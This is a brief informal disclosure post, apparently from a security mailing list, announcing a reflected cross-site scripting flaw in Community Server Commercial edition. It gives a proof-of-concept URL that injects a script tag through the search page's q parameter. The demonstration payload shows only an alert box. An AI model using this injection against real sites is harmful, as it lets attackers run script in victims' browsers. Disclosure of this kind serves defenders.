hey guys .. check out this new xss i just found ;P Vulnerable : communityserver Commercial edition web : http://communityserver.org/ XSS : http://localhost/path/search/SearchResults.aspx?q=%22%3e%3cscript%3ealert(%27bl4ck%27)%3c%2fscript%3e&o=Relevance Discovered By BLacK ZeRo bL4ck@xxxxxxxxxxx Best regards ,,